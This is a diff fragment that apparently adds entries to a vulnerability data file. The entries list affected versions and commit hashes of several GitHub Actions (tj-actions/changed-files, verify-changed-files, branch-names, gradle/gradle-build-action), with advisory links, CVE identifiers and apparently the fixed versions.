+ - ["tj-actions/changed-files", "v32", "1d6e210c970d01a876fbc6155212d068e79ca584", "41"]
+ - ["tj-actions/changed-files", "v31.0.3", "dd7c81416dd9ddc14c594f751cd92c661e13daee", "41"]
+ - ["tj-actions/changed-files", "v31.0.2", "528984a4f814905ea80ed2a3818afc97aef8b0de", "41"]
+ - ["tj-actions/changed-files", "v31.0.1", "75af1a47c484c669beec6a1d00fc9d1d78179725", "41"]
+ - ["tj-actions/changed-files", "v31.0.0", "5184a750a66da08aba414ca223aef75c055956a5", "41"]
+ - ["tj-actions/changed-files", "v31", "dd7c81416dd9ddc14c594f751cd92c661e13daee", "41"]
+ - ["tj-actions/changed-files", "v30.0.0", "402f3827f0f759df60b674e7f52a02d6f4a5af8b", "41"]
+ - ["tj-actions/changed-files", "v30", "402f3827f0f759df60b674e7f52a02d6f4a5af8b", "41"]
+ - ["tj-actions/changed-files", "v29.0.9", "f7a56405a89ea095c6230f10e7f1c49daab13b35", "41"]
+ - ["tj-actions/changed-files", "v29.0.8", "df4dacaa89cace34cd60d5e9580f041a041e5233", "41"]
+ - ["tj-actions/changed-files", "v29.0.7", "602081b5d9327a7770b4c447a4ee8984ae44e72e", "41"]
+ - ["tj-actions/changed-files", "v29.0.6", "6e12407521ea9b0d11a4b7ab09b40266bd39496a", "41"]
+ - ["tj-actions/changed-files", "v29.0.5", "c5c9b6ff9e75d84d8b69cbf82bcfbf61672ef91e", "41"]
+ - ["tj-actions/changed-files", "v29.0.4", "c41b7152594c4423f3787d26662239eb0ae027c0", "41"]
+ - ["tj-actions/changed-files", "v29.0.3", "60f4aabced9b4718c75acef86d42ffb631c4403a", "41"]
+ - ["tj-actions/changed-files", "v29.0.2", "82edb42dc4e3a5d5edf24cc3ae4b1f55c20cc220", "41"]
+ - ["tj-actions/changed-files", "v29.0.1", "18edda74753bbb7090ea030c1f80ef9610ebdff1", "41"]
+ - ["tj-actions/changed-files", "v29.0.0", "bec82ebb3493119ba317fcee8a0d1db09d39d1ac", "41"]
+ - ["tj-actions/changed-files", "v29", "f7a56405a89ea095c6230f10e7f1c49daab13b35", "41"]
+ - ["tj-actions/changed-files", "v28.0.0", "28ac6724247a133793509b5d165d58319b40a171", "41"]
+ - ["tj-actions/changed-files", "v28", "602cf940579b9a2b2db0aafe835bfdb675fac12c", "41"]
+ - ["tj-actions/changed-files", "v27", "5e56dcabdd4a97ea745791856930038be56d9b70", "41"]
+ - ["tj-actions/changed-files", "v26.1", "58ae566dc69a926834e4798bcfe0436ff97c0599", "41"]
+ - ["tj-actions/changed-files", "v26", "7394701157dae4adb4eaa75d8c99e9b2edff81fe", "41"]
+ - ["tj-actions/changed-files", "v25", "36e65a11651994e93d6f1ef3afa781c3dcbb9780", "41"]
+ - ["tj-actions/changed-files", "v24.1", "bf6ddb7db66f9da5b2cffeb28b2b696aacb26e1c", "41"]
+ - ["tj-actions/changed-files", "v24", "6c44eb8294bb9c93d6118427f4ff8404b695e1d7", "41"]
+ - ["tj-actions/changed-files", "v23.2", "b2ee165d6b42ab1740e1037eb93748aad96767c5", "41"]
+ - ["tj-actions/changed-files", "v23.1", "34a865a2b221bd60ec0d4c071f5e7a66ffdac88a", "41"]
+ - ["tj-actions/changed-files", "v23", "fb1fe28aa9ff24afc553b37545437005a4cf2115", "41"]
+ - ["tj-actions/changed-files", "v22.2", "ae90a0b602c90d598c0c027a519493c1a069543e", "41"]
+ - ["tj-actions/changed-files", "v22.1", "bc1dc8f54db8eeeaae00ab92737ab34926b9ad8d", "41"]
+ - ["tj-actions/changed-files", "v22", "3de1f9a283b61f308ee3045be4d301037657225a", "41"]
+ - ["tj-actions/changed-files", "v21", "0edfedf16d9ff0903cbe599d474a022823ca8fb8", "41"]
+ - ["tj-actions/changed-files", "v20.2", "205450238e81d3da0e0ec2d776f58c12846fddfb", "41"]
+ - ["tj-actions/changed-files", "v20.1", "944a8b89098b24b0723ed9264888eb7fcffbbe9a", "41"]
+ - ["tj-actions/changed-files", "v20", "581eef0495dd5b75a3dd93047ff9f0d42dc09370", "41"]
+ - ["tj-actions/changed-files", "v19.3", "e55f7fb99e90111108bc24d3f14156b06ab6a12c", "41"]
+ - ["tj-actions/changed-files", "v19.2", "07b38ce1a17c46f1d0eb1150c8a33f703d473262", "41"]
+ - ["tj-actions/changed-files", "v19.1", "d26252004aa87df12f72411feec056907ecdbadc", "41"]
+ - ["tj-actions/changed-files", "v19", "a6d456f542692915c5289ea834fb89bc07c11208", "41"]
+ - ["tj-actions/changed-files", "v18.7", "a59f800cbb60ed483623848e31be67659a2940f8", "41"]
+ - ["tj-actions/changed-files", "v18.6", "a2f1692a6f703b7a14e155ae404e6bb15538b763", "41"]
+ - ["tj-actions/changed-files", "v18.5", "72aab29255d4fd553ccf1c0fa3223dcc62a2fd84", "41"]
+ - ["tj-actions/changed-files", "v18.4", "e35d0afdc1f0b01f84ec0f4cdf1b179325634b36", "41"]
+ - ["tj-actions/changed-files", "v18.3", "081ee9cc54a7ded6c421c632f23a31dbbe34a5f3", "41"]
+ - ["tj-actions/changed-files", "v18.2", "1f30bd2085b83668fb636f1a1f90744d8adbacca", "41"]
+ - ["tj-actions/changed-files", "v18.1", "227e314ad84036340cab47e649d91b012275a53c", "41"]
+ - ["tj-actions/changed-files", "v18", "ffd30e8dd820b89653c2298acf0447d29dbd0f16", "41"]
+ - ["tj-actions/changed-files", "v17.3", "f5a8de7d36c5909d300d7fcc8d6340d2a56ab9d9", "41"]
+ - ["tj-actions/changed-files", "v17.2", "0bc7d4006fb085334217ec5d6e6c288daade2f59", "41"]
+ - ["tj-actions/changed-files", "v17.1", "a53d74f700f2982646d538e66ce35cbfc8d4e826", "41"]
+ - ["tj-actions/changed-files", "v17", "933541631c41bad3fe20bdbd440ec68afa9a9518", "41"]
+ - ["tj-actions/changed-files", "v16", "4daffbaee17b34b8ae544990906277485819cc16", "41"]
+ - ["tj-actions/changed-files", "v15.1", "4b1f26aed507a21569666773e1c753dfe409d806", "41"]
+ - ["tj-actions/changed-files", "v15", "09441d38eaf8b76cbe2c42e256f46dfb432f63a4", "41"]
+ - ["tj-actions/changed-files", "v14.7", "e44053b6a0e8e7df1aa50a171c46601c605f61bb", "41"]
+ - ["tj-actions/changed-files", "v14.6", "c0dba8199070f01fcea9cd3a4dc42b365f06bf8d", "41"]
+ - ["tj-actions/changed-files", "v14.5", "fd2e9917c337ba7e2222d5aa9e32b27a57a71d14", "41"]
+ - ["tj-actions/changed-files", "v14.4", "2a8a501ad614cd775a2c07537b555783496dc085", "41"]
+ - ["tj-actions/changed-files", "v14.3", "a8ea7202c1c248d93235e87cc59e5b3a9881f558", "41"]
+ - ["tj-actions/changed-files", "v14.2", "88edda5361ed308226d6cb938eaa8b18182750f5", "41"]
+ - ["tj-actions/changed-files", "v14.1", "be68c10267c4979ed30c9397041b052b2980f91f", "41"]
+ - ["tj-actions/changed-files", "v14", "b59431bc7d44f9e8951a290fc7d48879f2ca1939", "41"]
+ - ["tj-actions/changed-files", "v13.2", "68bd279d40fb5bfc976429283b060c6ee426f63c", "41"]
+ - ["tj-actions/changed-files", "v13.1", "2c85495a7bb72f2734cb5181e29b2ee5e08e61f7", "41"]
+ - ["tj-actions/changed-files", "v13", "f276697f3b86a1d897052524507c59f5e173ccd1", "41"]
+ - ["tj-actions/changed-files", "v12.2", "00f80efd45353091691a96565de08f4f50c685f8", "41"]
+ - ["tj-actions/changed-files", "v12.1", "f56e736bedd192c12951db94e83a440885d04eb1", "41"]
+ - ["tj-actions/changed-files", "v12", "019a09d36e5b592a6770a9a71ef1b3efd9a85d37", "41"]
+ - ["tj-actions/changed-files", "v11.9", "3b638a970886ec84db14ad956bb4df9766bd7c50", "41"]
+ - ["tj-actions/changed-files", "v11.8", "b42f932be5b3fee4a990cb3e03478d5da2d4293b", "41"]
+ - ["tj-actions/changed-files", "v11.7", "8dfe0ee3f4840f84a7947b5288b19d7a583755ae", "41"]
+ - ["tj-actions/changed-files", "v11.6", "aae164d51be780a235cdeea89752bbacbbfee3c3", "41"]
+ - ["tj-actions/changed-files", "v11.5", "09a879748c548705ec26508c030b11aad9b5097a", "41"]
+ - ["tj-actions/changed-files", "v11.4", "b54a7ae7259d0729d0b582bac28b05462f16cd64", "41"]
+ - ["tj-actions/changed-files", "v11.3", "902e60737927ccef3713faad3752d84f1153d7ac", "41"]
+ - ["tj-actions/changed-files", "v11.2", "2b51570d5f086eb07a1e527a182773b2045ec26b", "41"]
+ - ["tj-actions/changed-files", "v11.1", "040111b36775c1033b4703b77f9c5c203da18936", "41"]
+ - ["tj-actions/changed-files", "v11", "3b638a970886ec84db14ad956bb4df9766bd7c50", "41"]
+ - ["tj-actions/changed-files", "v10.1", "1d34e69895b85e643b9b259d54f395f0d1e27c10", "41"]
+ - ["tj-actions/changed-files", "v10", "b86b537e2b78397b630cfb1a8d0aec1e03379737", "41"]
+ - ["tj-actions/changed-files", "v9.3", "2a771ad30d623c27165b3677688ebe3f17c49f65", "41"]
+ - ["tj-actions/changed-files", "v9.2", "75933dc40b241db3752ed4c9e2f24cb7cfff51f9", "41"]
+ - ["tj-actions/changed-files", "v9.1", "2c0d12b627191145ce31c2a098d8d37e93b35861", "41"]
+ - ["tj-actions/changed-files", "v9", "7abdbc94e90b9a9b002ad86d8d2a5f9472c3c75c", "41"]
+ - ["tj-actions/changed-files", "v8.9", "675ab58887b9ae58d77d4dcd2d5e58228ab5f185", "41"]
+ - ["tj-actions/changed-files", "v8.8", "8c6f276ea5961fa51474aaa203c6d06226acbaa8", "41"]
+ - ["tj-actions/changed-files", "v8.7", "d825b1f7094e756ca34581aaab611003eaa23975", "41"]
+ - ["tj-actions/changed-files", "v8.6", "0bd70b7aecded5f2eb1f0498c3692433f2453b37", "41"]
+ - ["tj-actions/changed-files", "v8.5", "0fe67a1f15b48dcd40e7ea0dfdd4afc9418febf0", "41"]
+ - ["tj-actions/changed-files", "v8.4", "7bfa539f0d6ed4331d2899e7440a1946929829c1", "41"]
+ - ["tj-actions/changed-files", "v8.3", "d679de9200b28e963362cba99095dd8d9f23d446", "41"]
+ - ["tj-actions/changed-files", "v8.2", "1e10ed49507767257514a643ca1baab24a5496af", "41"]
+ - ["tj-actions/changed-files", "v8.1", "0754fdabe31b721683e1ffc719584df67ad24c87", "41"]
+ - ["tj-actions/changed-files", "v8", "d290bdd91e68dcf1bafe3fa63280666077cbc61c", "41"]
+ - ["tj-actions/changed-files", "v7", "15b1769fc52da64fe168a41ccb01c48b27687149", "41"]
+ - ["tj-actions/changed-files", "v6.3", "2ecd06deb6721d96fd1da0369fc6be39e974edba", "41"]
+ - ["tj-actions/changed-files", "v6.2", "5fe8e4d60450bbe483ca011b747c4a972a79ef07", "41"]
+ - ["tj-actions/changed-files", "v6.1", "7c66aa285d3ec22f1b8442b9a498ebb76ca5f57b", "41"]
+ - ["tj-actions/changed-files", "v6", "2ecd06deb6721d96fd1da0369fc6be39e974edba", "41"]
+ - ["tj-actions/changed-files", "v5.3", "e95bba87d2bd0b2bab4094abd9755a74f16703e6", "41"]
+ - ["tj-actions/changed-files", "v5.2", "7852058eeee10d857e59ce41f3cb465a70c96ae0", "41"]
+ - ["tj-actions/changed-files", "v5.1", "81f32e24026825ecfb7cb5d3951f91cfe788b0ad", "41"]
+ - ["tj-actions/changed-files", "v5.0.0", "450eadf5a0462f8d0b5e99d07d4b6d8f7358420c", "41"]
+ - ["tj-actions/changed-files", "v5", "0e956bb09e9b05df440a2459a041cdec3cc0cc0c", "41"]
+ - ["tj-actions/changed-files", "v4.4", "300e935beb285fcda513be84333e8726d5a544fb", "41"]
+ - ["tj-actions/changed-files", "v4.3", "fcb2ab8c32c2b66fdf94ab3deede353f8fe6f77c", "41"]
+ - ["tj-actions/changed-files", "v4.2", "271bbd60fedbc83dbb8cb00ce88bb4532d940e2f", "41"]
+ - ["tj-actions/changed-files", "v4.1", "e8ace0110cd60a2a0a729d52078ad6cec839dbb9", "41"]
+ - ["tj-actions/changed-files", "v4.0.7", "473984bd85c24f1fe61c0494d317cc7d490e1235", "41"]
+ - ["tj-actions/changed-files", "v4.0.6", "032f37fd241eeaf66ead8120552a3c6a157d1f22", "41"]
+ - ["tj-actions/changed-files", "v4.0.5", "3a35bdf667b36191faf1eea2b8c2cfbb8890bd25", "41"]
+ - ["tj-actions/changed-files", "v4.0.4", "c2216f65fdd828a28c41d6c97d242ec39ed694f3", "41"]
+ - ["tj-actions/changed-files", "v4.0.3", "0f16c26f3d5699a26be12446509c537ee964c1a8", "41"]
+ - ["tj-actions/changed-files", "v4.0.2", "271468ecafc0c12c5f0ce364317a640a5668eba7", "41"]
+ - ["tj-actions/changed-files", "v4.0.1", "fb063fc7d459d8ee25f9b3ed48ec83bc5c51df72", "41"]
+ - ["tj-actions/changed-files", "v4.0.0", "a05436ffa9505d25707f781260a99d01cebd0d13", "41"]
+ - ["tj-actions/changed-files", "v4", "c061ef1fa3d028267a34edff2d42a34c8d56ec53", "41"]
+ - ["tj-actions/changed-files", "v3.3", "489e2d514f3a230d66dbf74efec7ceed7b171703", "41"]
+ - ["tj-actions/changed-files", "v3.2", "8d5a33c6034b0991a3fe85b2e73012a689eadf92", "41"]
+ - ["tj-actions/changed-files", "v3.1", "fbfaba544e2ae235b2f88c936bcd5f8aa12419cc", "41"]
+ - ["tj-actions/changed-files", "v3.0.2", "1980f551b48196e1d8aa48fbfd924cedde0d3e13", "41"]
+ - ["tj-actions/changed-files", "v3.0.1", "a86b5608ded2e43fee87cbbde6394e0be7f46a41", "41"]
+ - ["tj-actions/changed-files", "v3.0.0", "f917cc3459f79321da6af2a153cb91ce82a34aaf", "41"]
+ - ["tj-actions/changed-files", "v3", "e18ccae8fe477263087493451ea812d4d36faa4e", "41"]
+ - ["tj-actions/changed-files", "v2.1", "e1d275d6d3255d6a586052675d3c5cef793edccf", "41"]
+ - ["tj-actions/changed-files", "v2.0.1", "00f80efd45353091691a96565de08f4f50c685f8", "41"]
+ - ["tj-actions/changed-files", "v2.0.0", "9c1a181e67797cd053d15062eda07b2b322bbbfe", "41"]
+ - ["tj-actions/changed-files", "v2", "5eaa2d80dddfe7de6f7cc75fcaeb554851737685", "41"]
+ - ["tj-actions/changed-files", "v1.3.1", "188487d180e816622215bd011cbaca666af41ed9", "41"]
+ - ["tj-actions/changed-files", "v1.3.0", "30988915fa46789ba51cc1436c92488a52ac44ee", "41"]
+ - ["tj-actions/changed-files", "v1.2.2", "467d26c8b77612d9f7d20df5271edc207eae69a7", "41"]
+ - ["tj-actions/changed-files", "v1.2.1", "d9eb683b30e5b231c948331ad364b991fa8be544", "41"]
+ - ["tj-actions/changed-files", "v1.2.0", "09a879748c548705ec26508c030b11aad9b5097a", "41"]
+ - ["tj-actions/changed-files", "v1.1.3", "8e7cc77ab9c1bffc233f2f3023d1b89ed44c9af5", "41"]
+ - ["tj-actions/changed-files", "v1.1.2", "81ad4b874479c31a00285815995079e20c6c2779", "41"]
+ - ["tj-actions/changed-files", "v1.1.1", "5e2a2f192377df7d67537b0e788e1b53e8a76f12", "41"]
+ - ["tj-actions/changed-files", "v1.1.0", "1af9ab38306a2fa478c9772eabab167444dbc755", "41"]
+ - ["tj-actions/changed-files", "v1.0.3", "55a857d66a8e01f50a2a37d18239edde79b1668d", "41"]
+ - ["tj-actions/changed-files", "v1.0.2", "62a9200adfe8200623dcd28ca74973e82baa954c", "41"]
+ - ["tj-actions/changed-files", "v1.0.1", "b915d091052b9d35e7c200d1da10cc6e2ec266e2", "41"]
+ - ["tj-actions/changed-files", "v1.0.0", "f0751de6af436d4e79016e2041cf6400e0833653", "41"]
+ - ["tj-actions/changed-files", "v1", "eef94236f6b9dec768f89dc72b9e0b64e13bb36e", "41"]
+
+ # tj-actions/verify-changed-files
+ # https://github.com/advisories/GHSA-ghm2-rq8q-wrhc
+ # CVE-2023-52137
+ - ["tj-actions/verify-changed-files", "v16.1.1", "54e20d3c522fbeed99ebaf2e38a1eb33214c58ba", "17"]
+ - ["tj-actions/verify-changed-files", "v16.1.0", "a9b6fd340565065ad293625200630be7fd2b0f13", "17"]
+ - ["tj-actions/verify-changed-files", "v16.0.1", "30aa174f53f67ecd5dc8e190dfbe46392202e5a5", "17"]
+ - ["tj-actions/verify-changed-files", "v16.0.0", "7f1b21ceb7ef533b97b46e89e2f882ee5cb17ae0", "17"]
+ - ["tj-actions/verify-changed-files", "v16", "54e20d3c522fbeed99ebaf2e38a1eb33214c58ba", "17"]
+ - ["tj-actions/verify-changed-files", "v15.0.2", "0409e189c445fab593a10a28e19663f0b012b5a5", "17"]
+ - ["tj-actions/verify-changed-files", "v15.0.1", "7da22d0521c254e711e5988bd2c7d48c2948d137", "17"]
+ - ["tj-actions/verify-changed-files", "v15.0.0", "7016858e130743cc6c6b472849411d40aa8ae1ce", "17"]
+ - ["tj-actions/verify-changed-files", "v15", "0409e189c445fab593a10a28e19663f0b012b5a5", "17"]
+ - ["tj-actions/verify-changed-files", "v14.0.2", "7517b838f3a0d51de4b334a61ef1330672118927", "17"]
+ - ["tj-actions/verify-changed-files", "v14.0.1", "bad2f5d7fc7e6812ac48d7e7207025a5a4cc93d3", "17"]
+ - ["tj-actions/verify-changed-files", "v14.0.0", "3b573ace62e287c3d68e24e4de2ee0c6f6280d86", "17"]
+ - ["tj-actions/verify-changed-files", "v14", "7517b838f3a0d51de4b334a61ef1330672118927", "17"]
+ - ["tj-actions/verify-changed-files", "v13.2.0", "f557547e643700f439745119efed5aac390db75d", "17"]
+ - ["tj-actions/verify-changed-files", "v13.1", "9ed3155b72ba709881c967f75611fc5852f773b9", "17"]
+ - ["tj-actions/verify-changed-files", "v13", "f557547e643700f439745119efed5aac390db75d", "17"]
+ - ["tj-actions/verify-changed-files", "v12.0", "a3391b5a01114c49c3a8d55181a9ff4c99bf0db7", "17"]
+ - ["tj-actions/verify-changed-files", "v12", "a3391b5a01114c49c3a8d55181a9ff4c99bf0db7", "17"]
+ - ["tj-actions/verify-changed-files", "v11.1", "1d7ee9711b0a8f675208004e66bc25d593a1a0ae", "17"]
+ - ["tj-actions/verify-changed-files", "v11", "c4322970b4f055ede155b95586b04562796f83b7", "17"]
+ - ["tj-actions/verify-changed-files", "v10.1", "6e986dfff1f61105bc496287b5bbf0776092737e", "17"]
+ - ["tj-actions/verify-changed-files", "v10", "fa6ea307b32e5314d4a62b1209c3c782d5b5dcc9", "17"]
+ - ["tj-actions/verify-changed-files", "v9.2", "6f40ee1d523d9a9223204ae06919a3b2739702dc", "17"]
+ - ["tj-actions/verify-changed-files", "v9.1", "1b13d2556290c5ca5a94b7d042b91f3519c17d38", "17"]
+ - ["tj-actions/verify-changed-files", "v9", "c09bcad97929b17bacf737670bee312af98be94f", "17"]
+ - ["tj-actions/verify-changed-files", "v8.8", "fda469d6b456070da68fa3fdbc07a513d858b200", "17"]
+ - ["tj-actions/verify-changed-files", "v8.7", "bd1e271a8d26e249e0412899d4e3d8f5a89ecd6c", "17"]
+ - ["tj-actions/verify-changed-files", "v8.6", "367ba21c800e2a2b1451e272d24cf0caa3e4f9e4", "17"]
+ - ["tj-actions/verify-changed-files", "v8.5", "9dea97ec0f35d708d32dadd9b34a6af7cc28b19f", "17"]
+ - ["tj-actions/verify-changed-files", "v8.4", "c154cc6a77695d4483937745499e07fee62addd3", "17"]
+ - ["tj-actions/verify-changed-files", "v8.3", "527ff7533afca6e5bece96bd15a998f90f54c624", "17"]
+ - ["tj-actions/verify-changed-files", "v8.2", "e8756d59f6d66ad7376c293832e4d6eda8ae3257", "17"]
+ - ["tj-actions/verify-changed-files", "v8.1", "bcb4e766c132157cda3d1e8c7ca3d68d86d6ae6b", "17"]
+ - ["tj-actions/verify-changed-files", "v8", "25267f57f3afa6c59f1495e52da8b08c2c586606", "17"]
+ - ["tj-actions/verify-changed-files", "v7.2", "ea24bfd8ba4b019cb321502a4382a7a44b6ebc01", "17"]
+ - ["tj-actions/verify-changed-files", "v7.1", "f2a40baded88e47fa3f8e0f614832835194f4904", "17"]
+ - ["tj-actions/verify-changed-files", "v7", "197e12135dd5eaedd520a27882d17c1f384cf6a0", "17"]
+ - ["tj-actions/verify-changed-files", "v6.2", "a8f1b11a7c4dfc6706d8c64416dda0ef85d06e77", "17"]
+ - ["tj-actions/verify-changed-files", "v6.1", "95c26dda77430743cb3542d24b3e739417f5a881", "17"]
+ - ["tj-actions/verify-changed-files", "v6", "97ba4ccf1285bdfca165bc0b0a7cb1f994dae04e", "17"]
+ - ["tj-actions/verify-changed-files", "v5.7", "68310bb8f2a087df9f6ab1a2cc07c1e7cfc8ea28", "17"]
+ - ["tj-actions/verify-changed-files", "v5.6", "720ba6a5776e8687117603acab16000c0fc8868b", "17"]
+ - ["tj-actions/verify-changed-files", "v5.5", "cedd7096b7f23ae0307d7d82f516d666580579b3", "17"]
+ - ["tj-actions/verify-changed-files", "v5.4", "d68d3d232ffbba653ab0227d4bb2001cda681d12", "17"]
+ - ["tj-actions/verify-changed-files", "v5.3", "2e1153b8d1546dea7cd1a9db9834daceb72af17a", "17"]
+ - ["tj-actions/verify-changed-files", "v5.2", "c3dd6355e363eab778c129867f91da02e3285961", "17"]
+ - ["tj-actions/verify-changed-files", "v5.1", "81bd1de29366c53364b43cf83c4a4ddcab53b571", "17"]
+ - ["tj-actions/verify-changed-files", "v5", "31a9c7487cc1096253faa121489f4dbb32ca4132", "17"]
+ - ["tj-actions/verify-changed-files", "v4", "e981d37638f538ab477279c9f1fb6048462fd161", "17"]
+ - ["tj-actions/verify-changed-files", "v3.0.4", "e7f801cef44ca52e9aa496526dcd71daf5ef8437", "17"]
+ - ["tj-actions/verify-changed-files", "v3.0.3", "e86d0b9d1805c4e84fc90d4bcdab7371e14173d2", "17"]
+ - ["tj-actions/verify-changed-files", "v3.0.2", "ad255a4b81fa69c78f5fd1bb8ac95739dd3a9580", "17"]
+ - ["tj-actions/verify-changed-files", "v3.0.1", "3a8aed1f8847cc121e5f08e8963755154bb9df9e", "17"]
+ - ["tj-actions/verify-changed-files", "v3.0.gamma", "de910b5a2cdd6814c6e41d2b7c6f678eb75d430a", "17"]
+ - ["tj-actions/verify-changed-files", "v3.0.g", "d31b2a1fd119abbeddd18df3d95001a141b37372", "17"]
+ - ["tj-actions/verify-changed-files", "v3.0.beta", "e61c6fc5323423d2f0d9f04c7d15fa52af1084b0", "17"]
+ - ["tj-actions/verify-changed-files", "v3.0.b", "380890dc80695b7aa8047c0f824f87234defabd7", "17"]
+ - ["tj-actions/verify-changed-files", "v3.0.alpha", "873cfd676aea5e2a04b3f16706bd590effb5023e", "17"]
+ - ["tj-actions/verify-changed-files", "v3.0.a", "b0c60c86ab292cabeb4b4dc9f34c296c314fdfbb", "17"]
+ - ["tj-actions/verify-changed-files", "v3", "71831832d68f9fa5b527a9d692df35e1626ddfa2", "17"]
+ - ["tj-actions/verify-changed-files", "v2.0a", "6555389afba06cce81bc2f57a191d54f380ece0a", "17"]
+ - ["tj-actions/verify-changed-files", "v2", "9828a95864031bd113695ad5c68944163008d861", "17"]
+ - ["tj-actions/verify-changed-files", "v1.0.1", "8150cee7a747364d6b113cf8b0f59af88453a161", "17"]
+ - ["tj-actions/verify-changed-files", "v1", "48ddf88305af39076d425f86f0617d6f7ff23d58", "17"]
+
+ # tj-actions/branch-names
+ # https://github.com/advisories/GHSA-8v8w-v8xg-79rf
+ # CVE-2023-49291
+ - ["tj-actions/branch-names", "v7.0.6", "ab304d8562e2f137165e1d930e6d22d431189074", "7.07"]
+ - ["tj-actions/branch-names", "v7.0.5", "033f2358d95522973eee35810e35a86fae4a71d8", "7.07"]
+ - ["tj-actions/branch-names", "v7.0.4", "f7cfbc8edeb70a87ebec52e94fa8366f5077d0bc", "7.07"]
+ - ["tj-actions/branch-names", "v7.0.3", "309671a59e1143038c2a50f009b6adf301f6aa71", "7.07"]
+ - ["tj-actions/branch-names", "v7.0.2", "636cfe47b2002897ee4d3f07792c9fdd5d7dc725", "7.07"]
+ - ["tj-actions/branch-names", "v7.0.1", "4e532392367d7e4fb2f494f2d50c47562660cce5", "7.07"]
+ - ["tj-actions/branch-names", "v7.0.0", "604fda4f4254216e3b564d60fe27d68017756558", "7.07"]
+ - ["tj-actions/branch-names", "v6.5", "2e5354c6733793113f416314375826df030ada23", "7.07"]
+ - ["tj-actions/branch-names", "v6.4", "eee8675bd61ec38bcfbfedd504d8473292ba649e", "7.07"]
+ - ["tj-actions/branch-names", "v6.3", "a594c1e96eab7790611fdaf5bc8f76ea55cedabd", "7.07"]
+ - ["tj-actions/branch-names", "v6.2", "b90df97be1c548ac9c8bd9186bfea6747153bf5e", "7.07"]
+ - ["tj-actions/branch-names", "v6.1", "09ab61130975078eb7cde103fe8d2ae1649a1853", "7.07"]
+ - ["tj-actions/branch-names", "v6", "2e5354c6733793113f416314375826df030ada23", "7.07"]
+ - ["tj-actions/branch-names", "v5.6", "63b65253bc9542d36a60646299bd8c9af6d9ce7e", "7.07"]
+ - ["tj-actions/branch-names", "v5.5", "a704b89383028b5df2a4fd0b9fac9711970f18be", "7.07"]
+ - ["tj-actions/branch-names", "v5.4", "b0f914ba0e7aa1e243b53df97447f71eb57da09a", "7.07"]
+ - ["tj-actions/branch-names", "v5.3", "e0e3be64a3f10f671bb526b715f86a8a834dce75", "7.07"]
+ - ["tj-actions/branch-names", "v5.2", "9cd06d955f4184031cd71fbb1717ac268ade2ee0", "7.07"]
+ - ["tj-actions/branch-names", "v5.1", "b99758d88d96a27ee98b444451c1602a4507d243", "7.07"]
+ - ["tj-actions/branch-names", "v5", "dc2e78ac9284175fdc0f2d505d8b49ef99632ea8", "7.07"]
+ - ["tj-actions/branch-names", "v4.9", "12c1d475292ae9bb96656e80c24172db3cd60ffb", "7.07"]
+ - ["tj-actions/branch-names", "v4.8", "af5c6741e639608a1c0e87eaa3c0c414d427d9e4", "7.07"]
+ - ["tj-actions/branch-names", "v4.7", "28a6a95bc5bcc69b16010647668f1c5c4fd0dcca", "7.07"]
+ - ["tj-actions/branch-names", "v4.6", "b0fc3aebc2f3fb8edfd024aea4dc8a073d10db88", "7.07"]
+ - ["tj-actions/branch-names", "v4.5", "a0061fbc59329b02d6c530f25b9d3fc80340a792", "7.07"]
+ - ["tj-actions/branch-names", "v4.4", "ce1737e426445fcb5b05a09e984b66d0b27548ba", "7.07"]
+ - ["tj-actions/branch-names", "v4.3", "47910e48331f8d64a4d535a35e9540c1ebf767f7", "7.07"]
+ - ["tj-actions/branch-names", "v4.2", "f107226331b387d31308ceb1b5767b52024508e8", "7.07"]
+ - ["tj-actions/branch-names", "v4.1", "98c04d51ee204c4f23daee8ee15af9e8e80e36b2", "7.07"]
+ - ["tj-actions/branch-names", "v4", "f107226331b387d31308ceb1b5767b52024508e8", "7.07"]
+ - ["tj-actions/branch-names", "v3.6", "3e0215fc2dd14b3e395f99b5e2cc1e4d93afe1b6", "7.07"]
+ - ["tj-actions/branch-names", "v3.5", "b587231a9abec0da6f45dbaea42d88a9c130ee8f", "7.07"]
+ - ["tj-actions/branch-names", "v3.4", "dd9939e9966a18c8ce9bfcf188731c4746faf197", "7.07"]
+ - ["tj-actions/branch-names", "v3.3", "509c3124abef4caaeb784a5aa6f465da588e0c43", "7.07"]
+ - ["tj-actions/branch-names", "v3.2", "ae7cf1163ab1375b4bbf5ec6d16a686118dac27d", "7.07"]
+ - ["tj-actions/branch-names", "v3.1", "eb14b2dffd7af08b599b691d72b757ae607675bd", "7.07"]
+ - ["tj-actions/branch-names", "v3", "fdb3a42221b1ee981def2a3e7767bd3ffcda0ff7", "7.07"]
+ - ["tj-actions/branch-names", "v2.2", "4362da73333d3a6ecf81047f6ae055cad78fcb38", "7.07"]
+ - ["tj-actions/branch-names", "v2.1", "8c72ffde4df03225c479f93fef608d8cdd1042f3", "7.07"]
+ - ["tj-actions/branch-names", "v2", "8307330ac59a26bd125a6f99c33820dd0baf439f", "7.07"]
+ - ["tj-actions/branch-names", "v1", "549ca323b2179ffc0f7f828b555e88fe53da3787", "7.07"]
+
+ # gradle/gradle-build-action
+ # https://github.com/advisories/GHSA-h3qr-39j9-4r5v
+ # CVE-2023-30853
+ - ["gradle/gradle-build-action", "v2.4.1", "5056fa9d50478a14af3c9925c12ca02318659d3e", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.4.0", "6095a76664413da4c8c134ee32e8a8ae900f0f1f", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.3.3", "3fbe033aaae657f011f88f29be9e65ed26bd29ef", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.3.2", "fd32ae908111fe31afa48827bd1ee909540aa971", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.3.1", "c295a4096e1d2c453eaf1f65c6f96686e26bd8be", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.3.0", "356abb47e7664b5505e25d7997a5a522a17c62d9", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.3.0-beta.1", "d427a379a8cc30e1c773080ce783e7e6d5167584", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.2.5", "cd579d970f8aec1cf0cae5f62a8e418768970015", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.2.4", "bf2a15ee94874758c21b91220b4d0ab84f762423", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.2.3", "9411346324b44f5402cbef3ac5a83a411086aa9a", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.2.2", "cd3cedc781988c804f626f4cd2dc51d0bdf02a12", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.2.1", "67421db6bd0bf253fb4bd25b31ebb98943c375e1", "2.4.2"]
